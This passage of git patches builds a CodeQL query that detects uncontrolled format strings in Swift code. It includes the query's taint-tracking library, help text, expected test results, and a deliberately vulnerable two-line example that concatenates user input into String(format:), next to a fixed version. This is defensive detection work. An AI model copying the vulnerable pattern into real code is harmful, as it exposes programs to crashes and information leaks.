b/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatString.qhelp new file mode 100644 index 00000000000..71b74e13c04 --- /dev/null +++ b/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatString.qhelp @@ -0,0 +1,39 @@ + + + +

    +Passing untrusted format strings to functions that use printf style formatting can lead to buffer overflows and data representation problems. An attacker can exploit this weakness to crash the program or obtain sensitive information from its internal state.

    +

    + +     + + +

    Use a string literal for the format string to prevent the possibility of data flow from +an untrusted source. This also helps to prevent errors where the format arguments do not match the format string.

    + +

    If the format string cannot be constant, ensure that it comes from a secure data source or is compiled into the source code. If you need to include a value from the user, use the %s specifier in the format string and include that value as a format argument. +

    + +     + + +

    In this example, the format string includes a user-controlled inputString:

    + + + +

    To fix it, make inputString a format argument rather than part of the format string, as in the following code:

    + + + +     + + +
  • +OWASP: +Format string attack. +
    • + +     +     diff --git a/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatStringBad.swift b/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatStringBad.swift new file mode 100644 index 00000000000..8bce9ef8128 --- /dev/null +++ b/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatStringBad.swift @@ -0,0 +1,2 @@ + +print(String(format: "User input: " + inputString)) // vulnerable diff --git a/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatStringGood.swift b/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatStringGood.swift new file mode 100644 index 00000000000..3c5431b9f5c --- /dev/null +++ b/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatStringGood.swift @@ -0,0 +1,2 @@ + +print(String(format: "User input: %s", inputString)) // fixed From 58e9a0436e29d48616bd155e3c0a6f46753ffeb3 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 1 Dec 2022 16:50:11 +0000 Subject: [PATCH 018/381] Swift: Add metadata. --- .../queries/Security/CWE-134/UncontrolledFormatString.ql | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatString.ql b/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatString.ql index e4c7049fdb2..9073333fba0 100644 --- a/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatString.ql +++ b/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatString.ql @@ -1,10 +1,10 @@ /** * @name Uncontrolled format string - * @description TODO + * @description Using external input in format strings can lead to exceptions or information leaks. * @kind path-problem - * @problem.severity TODO + * @problem.severity error * @security-severity TODO - * @precision TODO + * @precision high * @id swift/uncontrolled-format-string * @tags security * external/cwe/cwe-134 From 87fa159384471dc5c22f29689ace13e1cf520d2c Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 1 Dec 2022 17:26:38 +0000 Subject: [PATCH 019/381] Swift: Add security-severity, and correct one for another query that apparently wasn't right. --- .../ql/src/queries/Security/CWE-134/UncontrolledFormatString.ql | 2 +- swift/ql/src/queries/Security/CWE-321/HardcodedEncryptionKey.ql | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatString.ql b/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatString.ql index 9073333fba0..b8a82747105 100644 --- a/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatString.ql +++ b/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatString.ql @@ -3,7 +3,7 @@ * @description Using external input in format strings can lead to exceptions or information leaks. * @kind path-problem * @problem.severity error - * @security-severity TODO + * @security-severity 9.3 * @precision high * @id swift/uncontrolled-format-string * @tags security diff --git a/swift/ql/src/queries/Security/CWE-321/HardcodedEncryptionKey.ql b/swift/ql/src/queries/Security/CWE-321/HardcodedEncryptionKey.ql index 2f2c88855b2..36132d93b78 100644 --- a/swift/ql/src/queries/Security/CWE-321/HardcodedEncryptionKey.ql +++ b/swift/ql/src/queries/Security/CWE-321/HardcodedEncryptionKey.ql @@ -3,7 +3,7 @@ * @description Using hardcoded keys for encryption is not secure, because potential attackers can easily guess them. * @kind path-problem * @problem.severity error - * @security-severity 8.1 + * @security-severity 7.7 * @precision high * @id swift/hardcoded-key * @tags security From 43596869e73331689cc3456ceb71e16b36ae976b Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 1 Dec 2022 17:35:05 +0000 Subject: [PATCH 020/381] Swift: Move query logic to a .qll. --- .../UncontrolledFormatStringQuery.qll | 91 +++++++++++++++++++ .../CWE-134/UncontrolledFormatString.ql | 86 +----------------- 2 files changed, 92 insertions(+), 85 deletions(-) create mode 100644 swift/ql/lib/codeql/swift/security/UncontrolledFormatStringQuery.qll diff --git a/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringQuery.qll b/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringQuery.qll new file mode 100644 index 00000000000..b54b8d1cd70 --- /dev/null +++ b/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringQuery.qll @@ -0,0 +1,91 @@ +/** + * Provides a taint-tracking configuration for reasoning about uncontrolled format string + * vulnerabilities. + */ + +import swift +import codeql.swift.dataflow.DataFlow +import codeql.swift.dataflow.TaintTracking +import codeql.swift.dataflow.FlowSources + +/** + * A function that takes a `printf` style format argument. + */ +abstract class FormattingFunction extends AbstractFunctionDecl { + /** + * Gets the position of the format argument. + */ + abstract int getFormatParameterIndex(); +} + +/** + * An initializer for `String`, `NSString` or `NSMutableString` that takes a + * `printf` style format argument. + */ +class StringInitWithFormat extends FormattingFunction, MethodDecl { + StringInitWithFormat() { + exists(string fName | + this.hasQualifiedName(["String", "NSString", "NSMutableString"], fName) and + fName.matches("init(format:%") + ) + } + + override int getFormatParameterIndex() { result = 0 } +} + +/** + * The `localizedStringWithFormat` method of `String`, `NSString` and `NSMutableString`. + */ +class LocalizedStringWithFormat extends FormattingFunction, MethodDecl { + LocalizedStringWithFormat() { + this.hasQualifiedName(["String", "NSString", "NSMutableString"], + "localizedStringWithFormat(_:_:)") + } + + override int getFormatParameterIndex() { result = 0 } +} + +/** + * The functions `NSLog` and `NSLogv`. + */ +class NsLog extends FormattingFunction, FreeFunctionDecl { + NsLog() { this.getName() = ["NSLog(_:_:)", "NSLogv(_:_:)"] } + + override int getFormatParameterIndex() { result = 0 } +} + +/** + * The `NSException.raise` method. + */ +class NsExceptionRaise extends FormattingFunction, MethodDecl { + NsExceptionRaise() { this.hasQualifiedName("NSException", "raise(_:format:arguments:)") } + + override int getFormatParameterIndex() { result = 1 } +} + +/** + * A call to a function that takes a `printf` style format argument. + */ +class FormattingFunctionCall extends CallExpr { + FormattingFunction target; + + FormattingFunctionCall() { target = this.getStaticTarget() } + + /** + * Gets the format expression used in this call. + */ + Expr getFormat() { result = this.getArgument(target.getFormatParameterIndex()).getExpr() } +} + +/** + * A taint configuration for tainted data that reaches a format string. + */ +class TaintedFormatConfiguration extends TaintTracking::Configuration { + TaintedFormatConfiguration() { this = "TaintedFormatConfiguration" } + + override predicate isSource(DataFlow::Node node) { node instanceof FlowSource } + + override predicate isSink(DataFlow::Node node) { + node.asExpr() = any(FormattingFunctionCall fc).getFormat() + } +} diff --git a/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatString.ql b/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatString.ql index b8a82747105..0452d965b97 100644 --- a/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatString.ql +++ b/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatString.ql @@ -12,92 +12,8 @@ import swift import codeql.swift.dataflow.DataFlow -import codeql.swift.dataflow.TaintTracking -import codeql.swift.dataflow.FlowSources +import codeql.swift.security.UncontrolledFormatStringQuery import DataFlow::PathGraph -import swift - -/** - * A function that takes a `printf` style format argument. - */ -abstract class FormattingFunction extends AbstractFunctionDecl { - /** - * Gets the position of the format argument. - */ - abstract int getFormatParameterIndex(); -} - -/** - * An initializer for `String`, `NSString` or `NSMutableString` that takes a - * `printf` style format argument. - */ -class StringInitWithFormat extends FormattingFunction, MethodDecl { - StringInitWithFormat() { - exists(string fName | - this.hasQualifiedName(["String", "NSString", "NSMutableString"], fName) and - fName.matches("init(format:%") - ) - } - - override int getFormatParameterIndex() { result = 0 } -} - -/** - * The `localizedStringWithFormat` method of `String`, `NSString` and `NSMutableString`. - */ -class LocalizedStringWithFormat extends FormattingFunction, MethodDecl { - LocalizedStringWithFormat() { - this.hasQualifiedName(["String", "NSString", "NSMutableString"], - "localizedStringWithFormat(_:_:)") - } - - override int getFormatParameterIndex() { result = 0 } -} - -/** - * The functions `NSLog` and `NSLogv`. - */ -class NsLog extends FormattingFunction, FreeFunctionDecl { - NsLog() { this.getName() = ["NSLog(_:_:)", "NSLogv(_:_:)"] } - - override int getFormatParameterIndex() { result = 0 } -} - -/** - * The `NSException.raise` method. - */ -class NsExceptionRaise extends FormattingFunction, MethodDecl { - NsExceptionRaise() { this.hasQualifiedName("NSException", "raise(_:format:arguments:)") } - - override int getFormatParameterIndex() { result = 1 } -} - -/** - * A call to a function that takes a `printf` style format argument. - */ -class FormattingFunctionCall extends CallExpr { - FormattingFunction target; - - FormattingFunctionCall() { target = this.getStaticTarget() } - - /** - * Gets the format expression used in this call. - */ - Expr getFormat() { result = this.getArgument(target.getFormatParameterIndex()).getExpr() } -} - -/** - * A taint configuration for tainted data that reaches a format string. - */ -class TaintedFormatConfiguration extends TaintTracking::Configuration { - TaintedFormatConfiguration() { this = "TaintedFormatConfiguration" } - - override predicate isSource(DataFlow::Node node) { node instanceof FlowSource } - - override predicate isSink(DataFlow::Node node) { - node.asExpr() = any(FormattingFunctionCall fc).getFormat() - } -} from TaintedFormatConfiguration config, DataFlow::PathNode sourceNode, DataFlow::PathNode sinkNode where config.hasFlowPath(sourceNode, sinkNode) From ad05cc3cb1533a56710bcaa5fd762f712b670ba9 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 1 Dec 2022 17:46:43 +0000 Subject: [PATCH 021/381] Swift: Separate out a FormatString library as well. --- swift/ql/lib/codeql/swift/FormatString.qll | 74 +++++++++++++++++++ .../UncontrolledFormatStringQuery.qll | 70 +----------------- 2 files changed, 75 insertions(+), 69 deletions(-) create mode 100644 swift/ql/lib/codeql/swift/FormatString.qll diff --git a/swift/ql/lib/codeql/swift/FormatString.qll b/swift/ql/lib/codeql/swift/FormatString.qll new file mode 100644 index 00000000000..4dbb127fc69 --- /dev/null +++ b/swift/ql/lib/codeql/swift/FormatString.qll @@ -0,0 +1,74 @@ +/** + * Provides classes and predicates for reasoning about string formatting. + */ + +import swift + +/** + * A function that takes a `printf` style format argument. + */ +abstract class FormattingFunction extends AbstractFunctionDecl { + /** + * Gets the position of the format argument. + */ + abstract int getFormatParameterIndex(); +} + +/** + * A call to a function that takes a `printf` style format argument. + */ +class FormattingFunctionCall extends CallExpr { + FormattingFunction target; + + FormattingFunctionCall() { target = this.getStaticTarget() } + + /** + * Gets the format expression used in this call. + */ + Expr getFormat() { result = this.getArgument(target.getFormatParameterIndex()).getExpr() } +} + +/** + * An initializer for `String`, `NSString` or `NSMutableString` that takes a + * `printf` style format argument. + */ +class StringInitWithFormat extends FormattingFunction, MethodDecl { + StringInitWithFormat() { + exists(string fName | + this.hasQualifiedName(["String", "NSString", "NSMutableString"], fName) and + fName.matches("init(format:%") + ) + } + + override int getFormatParameterIndex() { result = 0 } +} + +/** + * The `localizedStringWithFormat` method of `String`, `NSString` and `NSMutableString`. + */ +class LocalizedStringWithFormat extends FormattingFunction, MethodDecl { + LocalizedStringWithFormat() { + this.hasQualifiedName(["String", "NSString", "NSMutableString"], + "localizedStringWithFormat(_:_:)") + } + + override int getFormatParameterIndex() { result = 0 } +} + +/** + * The functions `NSLog` and `NSLogv`. + */ +class NsLog extends FormattingFunction, FreeFunctionDecl { + NsLog() { this.getName() = ["NSLog(_:_:)", "NSLogv(_:_:)"] } + + override int getFormatParameterIndex() { result = 0 } +} + +/** + * The `NSException.raise` method. + */ +class NsExceptionRaise extends FormattingFunction, MethodDecl { + NsExceptionRaise() { this.hasQualifiedName("NSException", "raise(_:format:arguments:)") } + + override int getFormatParameterIndex() { result = 1 } +} diff --git a/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringQuery.qll b/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringQuery.qll index b54b8d1cd70..b489572cb97 100644 --- a/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringQuery.qll +++ b/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringQuery.qll @@ -4,79 +4,11 @@ */ import swift +import codeql.swift.StringFormat import codeql.swift.dataflow.DataFlow import codeql.swift.dataflow.TaintTracking import codeql.swift.dataflow.FlowSources -/** - * A function that takes a `printf` style format argument. - */ -abstract class FormattingFunction extends AbstractFunctionDecl { - /** - * Gets the position of the format argument. - */ - abstract int getFormatParameterIndex(); -} - -/** - * An initializer for `String`, `NSString` or `NSMutableString` that takes a - * `printf` style format argument. - */ -class StringInitWithFormat extends FormattingFunction, MethodDecl { - StringInitWithFormat() { - exists(string fName | - this.hasQualifiedName(["String", "NSString", "NSMutableString"], fName) and - fName.matches("init(format:%") - ) - } - - override int getFormatParameterIndex() { result = 0 } -} - -/** - * The `localizedStringWithFormat` method of `String`, `NSString` and `NSMutableString`. - */ -class LocalizedStringWithFormat extends FormattingFunction, MethodDecl { - LocalizedStringWithFormat() { - this.hasQualifiedName(["String", "NSString", "NSMutableString"], - "localizedStringWithFormat(_:_:)") - } - - override int getFormatParameterIndex() { result = 0 } -} - -/** - * The functions `NSLog` and `NSLogv`. - */ -class NsLog extends FormattingFunction, FreeFunctionDecl { - NsLog() { this.getName() = ["NSLog(_:_:)", "NSLogv(_:_:)"] } - - override int getFormatParameterIndex() { result = 0 } -} - -/** - * The `NSException.raise` method. - */ -class NsExceptionRaise extends FormattingFunction, MethodDecl { - NsExceptionRaise() { this.hasQualifiedName("NSException", "raise(_:format:arguments:)") } - - override int getFormatParameterIndex() { result = 1 } -} - -/** - * A call to a function that takes a `printf` style format argument. - */ -class FormattingFunctionCall extends CallExpr { - FormattingFunction target; - - FormattingFunctionCall() { target = this.getStaticTarget() } - - /** - * Gets the format expression used in this call. - */ - Expr getFormat() { result = this.getArgument(target.getFormatParameterIndex()).getExpr() } -} - /** * A taint configuration for tainted data that reaches a format string. */ From 157a7829ca377c8bc7e483a3c108da0b1a5b44c9 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 1 Dec 2022 18:35:10 +0000 Subject: [PATCH 022/381] Swift: correct the example. --- .../src/queries/Security/CWE-134/UncontrolledFormatString.qhelp | 2 +- .../queries/Security/CWE-134/UncontrolledFormatStringGood.swift | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatString.qhelp b/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatString.qhelp index 71b74e13c04..f0f60aedfd0 100644 --- a/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatString.qhelp +++ b/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatString.qhelp @@ -13,7 +13,7 @@ Passing untrusted format strings to functions that use printf style

    Use a string literal for the format string to prevent the possibility of data flow from an untrusted source. This also helps to prevent errors where the format arguments do not match the format string.

    -

    If the format string cannot be constant, ensure that it comes from a secure data source or is compiled into the source code. If you need to include a value from the user, use the %s specifier in the format string and include that value as a format argument. +

    If the format string cannot be constant, ensure that it comes from a secure data source or is compiled into the source code. If you need to include a value from the user, use the %@ specifier in the format string and include that value as a format argument.

    diff --git a/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatStringGood.swift b/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatStringGood.swift index 3c5431b9f5c..d0d85952956 100644 --- a/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatStringGood.swift +++ b/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatStringGood.swift @@ -1,2 +1,2 @@ -print(String(format: "User input: %s", inputString)) // fixed +print(String(format: "User input: %@", inputString)) // fixed From f7ebd1312ee40035731fbf2fff51d7e266da58ad Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 1 Dec 2022 19:16:40 +0000 Subject: [PATCH 023/381] Swift: Corrections. --- .../{FormatString.qll => StringFormat.qll} | 0 .../security/UncontrolledFormatStringQuery.qll | 6 +++--- .../CWE-134/UncontrolledFormatString.qhelp | 11 +++++------ .../CWE-134/UncontrolledFormatString.ql | 4 ++-- .../CWE-134/UncontrolledFormatString.expected | 18 +++++++++--------- .../CWE-134/UncontrolledFormatString.swift | 4 ++-- 6 files changed, 21 insertions(+), 22 deletions(-) rename swift/ql/lib/codeql/swift/{FormatString.qll => StringFormat.qll} (100%) diff --git a/swift/ql/lib/codeql/swift/FormatString.qll b/swift/ql/lib/codeql/swift/StringFormat.qll similarity index 100% rename from swift/ql/lib/codeql/swift/FormatString.qll rename to swift/ql/lib/codeql/swift/StringFormat.qll diff --git a/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringQuery.qll b/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringQuery.qll index b489572cb97..41ff57f2084 100644 --- a/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringQuery.qll +++ b/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringQuery.qll @@ -1,8 +1,8 @@ /** - * Provides a taint-tracking configuration for reasoning about uncontrolled format string - * vulnerabilities. + * Provides a taint-tracking configuration for reasoning about uncontrolled + * format string vulnerabilities. */ - + import swift import codeql.swift.StringFormat import codeql.swift.dataflow.DataFlow diff --git a/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatString.qhelp b/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatString.qhelp index f0f60aedfd0..efc5eb9bff9 100644 --- a/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatString.qhelp +++ b/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatString.qhelp @@ -4,16 +4,15 @@

    -Passing untrusted format strings to functions that use printf style formatting can lead to buffer overflows and data representation problems. An attacker can exploit this weakness to crash the program or obtain sensitive information from its internal state.

    -

    +Passing untrusted format strings to functions that use printf style formatting can lead to buffer overflows and data representation problems. An attacker may be able to exploit this weakness to crash the program or obtain sensitive information from its internal state.

     -

    Use a string literal for the format string to prevent the possibility of data flow from +

    Use a constant string literal for the format string to prevent the possibility of data flow from an untrusted source. This also helps to prevent errors where the format arguments do not match the format string.

    -

    If the format string cannot be constant, ensure that it comes from a secure data source or is compiled into the source code. If you need to include a value from the user, use the %@ specifier in the format string and include that value as a format argument. +

    If the format string cannot be constant, ensure that it comes from a secure data source or is compiled into the source code. If you need to include a string value from the user, use an appropriate specifier (such as %@) in the format string and include the user provided value as a format argument.

    @@ -21,11 +20,11 @@ an untrusted source. This also helps to prevent errors where the format argument

    In this example, the format string includes a user-controlled inputString:

    - +

    To fix it, make inputString a format argument rather than part of the format string, as in the following code:

    - + diff --git a/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatString.ql b/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatString.ql index 0452d965b97..6d2540c864e 100644 --- a/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatString.ql +++ b/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatString.ql @@ -17,5 +17,5 @@ import DataFlow::PathGraph from TaintedFormatConfiguration config, DataFlow::PathNode sourceNode, DataFlow::PathNode sinkNode where config.hasFlowPath(sourceNode, sinkNode) -select sinkNode.getNode(), sourceNode, sinkNode, "This format string is derived from a $@.", - sourceNode.getNode(), "user-provided value" +select sinkNode.getNode(), sourceNode, sinkNode, "This format string depends on $@.", + sourceNode.getNode(), "a user-provided value" diff --git a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected index 56aaf090d4a..f1faf8c16f0 100644 --- a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected +++ b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected @@ -21,12 +21,12 @@ nodes | UncontrolledFormatString.swift:89:61:89:61 | tainted | semmle.label | tainted | subpaths #select -| UncontrolledFormatString.swift:68:28:68:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:68:28:68:28 | tainted | This format string is derived from a $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | user-provided value | -| UncontrolledFormatString.swift:71:28:71:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:71:28:71:28 | tainted | This format string is derived from a $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | user-provided value | -| UncontrolledFormatString.swift:72:28:72:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:72:28:72:28 | tainted | This format string is derived from a $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | user-provided value | -| UncontrolledFormatString.swift:74:28:74:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:74:28:74:28 | tainted | This format string is derived from a $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | user-provided value | -| UncontrolledFormatString.swift:75:28:75:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:75:28:75:28 | tainted | This format string is derived from a $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | user-provided value | -| UncontrolledFormatString.swift:76:28:76:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:76:28:76:28 | tainted | This format string is derived from a $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | user-provided value | -| UncontrolledFormatString.swift:77:46:77:46 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:77:46:77:46 | tainted | This format string is derived from a $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | user-provided value | -| UncontrolledFormatString.swift:86:11:86:11 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:86:11:86:11 | tainted | This format string is derived from a $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | user-provided value | -| UncontrolledFormatString.swift:89:61:89:61 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:89:61:89:61 | tainted | This format string is derived from a $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | user-provided value | +| UncontrolledFormatString.swift:68:28:68:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:68:28:68:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | a user-provided value | +| UncontrolledFormatString.swift:71:28:71:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:71:28:71:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | a user-provided value | +| UncontrolledFormatString.swift:72:28:72:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:72:28:72:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | a user-provided value | +| UncontrolledFormatString.swift:74:28:74:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:74:28:74:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | a user-provided value | +| UncontrolledFormatString.swift:75:28:75:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:75:28:75:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | a user-provided value | +| UncontrolledFormatString.swift:76:28:76:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:76:28:76:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | a user-provided value | +| UncontrolledFormatString.swift:77:46:77:46 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:77:46:77:46 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | a user-provided value | +| UncontrolledFormatString.swift:86:11:86:11 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:86:11:86:11 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | a user-provided value | +| UncontrolledFormatString.swift:89:61:89:61 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:89:61:89:61 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | a user-provided value | diff --git a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.swift b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.swift index 3536bee3954..e6d1d8a2646 100644 --- a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.swift +++ b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.swift @@ -3,7 +3,7 @@ struct URL { - init?(string: String) {} + init?(string: String) {} } struct Locale { @@ -12,7 +12,7 @@ struct Locale { extension String : CVarArg { public var _cVarArgEncoding: [Int] { get { return [] } } - init(contentsOf: URL) throws { self.init() } + init(contentsOf: URL) throws { self.init() } init(format: String, _ arguments: CVarArg...) { self.init() } init(format: String, arguments: [CVarArg]) { self.init() } init(format: String, locale: Locale?, _ args: CVarArg...) { self.init() } From 85a0a42da91c4182fa3fa913cba2245a61a27d9b Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 2 Dec 2022 10:15:11 +0000 Subject: [PATCH 024/381] Swift: try again to satisfy ql-for-ql. --- .../CWE-134/UncontrolledFormatString.ql | 2 +- .../CWE-134/UncontrolledFormatString.expected | 18 +++++++++--------- 2 files changed, 10 insertions(+), 10 deletions(-) diff --git a/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatString.ql b/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatString.ql index 6d2540c864e..d5111f50e3a 100644 --- a/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatString.ql +++ b/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatString.ql @@ -18,4 +18,4 @@ import DataFlow::PathGraph from TaintedFormatConfiguration config, DataFlow::PathNode sourceNode, DataFlow::PathNode sinkNode where config.hasFlowPath(sourceNode, sinkNode) select sinkNode.getNode(), sourceNode, sinkNode, "This format string depends on $@.", - sourceNode.getNode(), "a user-provided value" + sourceNode.getNode(), "this user-provided value" diff --git a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected index f1faf8c16f0..fcca34232d4 100644 --- a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected +++ b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected @@ -21,12 +21,12 @@ nodes | UncontrolledFormatString.swift:89:61:89:61 | tainted | semmle.label | tainted | subpaths #select -| UncontrolledFormatString.swift:68:28:68:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:68:28:68:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | a user-provided value | -| UncontrolledFormatString.swift:71:28:71:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:71:28:71:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | a user-provided value | -| UncontrolledFormatString.swift:72:28:72:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:72:28:72:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | a user-provided value | -| UncontrolledFormatString.swift:74:28:74:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:74:28:74:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | a user-provided value | -| UncontrolledFormatString.swift:75:28:75:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:75:28:75:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | a user-provided value | -| UncontrolledFormatString.swift:76:28:76:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:76:28:76:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | a user-provided value | -| UncontrolledFormatString.swift:77:46:77:46 | tainted | 